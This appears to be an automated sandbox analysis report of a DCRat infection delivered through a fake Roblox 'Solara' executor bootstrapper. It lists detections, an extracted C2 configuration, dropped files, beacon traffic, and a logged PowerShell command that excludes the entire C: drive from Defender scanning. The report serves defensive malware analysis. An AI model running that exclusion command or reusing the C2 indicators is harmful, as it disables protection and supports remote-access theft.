Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, ParentProcessId: 6496, ParentProcessName: Solaraexecutor.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , ProcessId: 3260, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe", ParentImage: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, ParentProcessId: 6520, ParentProcessName: PerfNET.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 4296, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-14T12:53:05.144390+0200	2048095	1	A Network Trojan was detected	192.168.2.4	62761	80.211.144.156	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: BootstrapperV1.19.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://getsolara.dev/	Avira URL Cloud: Label: phishing
Source: https://getsolara.dev/asset/discord.json	Avira URL Cloud: Label: phishing
Source: http://getsolara.dev	Avira URL Cloud: Label: phishing
Source: https://getsolara.dev	Avira URL Cloud: Label: phishing
Source: https://getsolara.dev/api/endpoint.json	Avira URL Cloud: Label: phishing
Source: https://getsolara.dev/Suspected	Avira URL Cloud: Label: phishing
Source: https://getsolara.dev/X	Avira URL Cloud: Label: phishing
Source: http://598828cm.n9shka.top/VmPollSecureLongpollApiBasewindowsUniversal.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Avira: detection malicious, Label: TR/Redcap.oczed
Source: C:\Users\Default\AppData\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Avira: detection malicious, Label: VBS/Runner.VPG

Found malware configuration

Source: 0000000D.00000002.2305646369.000000001348B000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://598828cm.n9shka.top/VmPollSecureLongpollApiBasewindowsUniversal", "MUTEX": "DCR_MUTEX-BLa09nxFf1DKMOkShfe9", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for domain / URL

Source: getsolara.dev	Virustotal: Detection: 13%	Perma Link
Source: https://getsolara.dev/	Virustotal: Detection: 12%	Perma Link
Source: https://getsolara.dev/asset/discord.json	Virustotal: Detection: 9%	Perma Link
Source: http://getsolara.dev	Virustotal: Detection: 13%	Perma Link
Source: https://getsolara.dev	Virustotal: Detection: 12%	Perma Link
Source: https://getsolara.dev/Suspected	Virustotal: Detection: 11%	Perma Link
Source: https://getsolara.dev/api/endpoint.json	Virustotal: Detection: 9%	Perma Link
Source: https://getsolara.dev/X	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	ReversingLabs: Detection: 57%
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe	ReversingLabs: Detection: 57%
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	ReversingLabs: Detection: 57%
Source: C:\Users\Default\AppData\RuntimeBroker.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: BootstrapperV1.19.exe	Virustotal: Detection: 87%			Perma Link
Source: BootstrapperV1.19.exe	ReversingLabs: Detection: 94%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	Joe Sandbox ML: detected
Source: C:\Users\Default\AppData\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: BootstrapperV1.19.exe

Joe Sandbox ML: detected

Source: BootstrapperV1.19.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 172.67.203.125:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 128.116.123.4:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.4:49735 version: TLS 1.2

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: BootstrapperV1.19.exe
Source:	Binary string: System.Runtime.Serialization.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Data.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Xml.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.pdb` source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Configuration.pdb[ source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.ni.pdbRSDS source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE8E6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbX source: BootstrapperV1.19.exe, 00000001.00000002.1952437067.00000158AE455000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER5022.tmp.dmp.7.dr
Source:	Binary string: em.pdb3s[ source: BootstrapperV1.19.exe, 00000001.00000002.1952437067.00000158AE460000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Data.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER5022.tmp.dmp.7.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.PDB4y source: BootstrapperV1.19.exe, 00000001.00000002.1952437067.00000158AE460000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.pdb source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE8E6000.00000004.00000800.00020000.00000000.sdmp, WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Data.pdbH source: WER5022.tmp.dmp.7.dr
Source:	Binary string: mscorlib.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: mscorlib.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Core.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Runtime.Serialization.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Runtime.Serialization.pdbMZ source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.ni.pdb source: WER5022.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER5022.tmp.dmp.7.dr

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D2A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		3_2_00D2A69B
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D3C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		3_2_00D3C220

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62761 -> 80.211.144.156:80

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Yara detected Generic Downloader

Source: Yara match	File source: 1.0.BootstrapperV1.19.exe.158ac680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, type: DROPPED

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: getsolara.devConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /asset/discord.json HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: getsolara.dev
Source: global traffic	HTTP traffic detected: GET /raw/pjseRvyK HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: clientsettings.roblox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: www.nodejs.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 80.211.144.156 80.211.144.156

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1732Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1744Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1000Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1744Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 249380Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1736Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1724Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
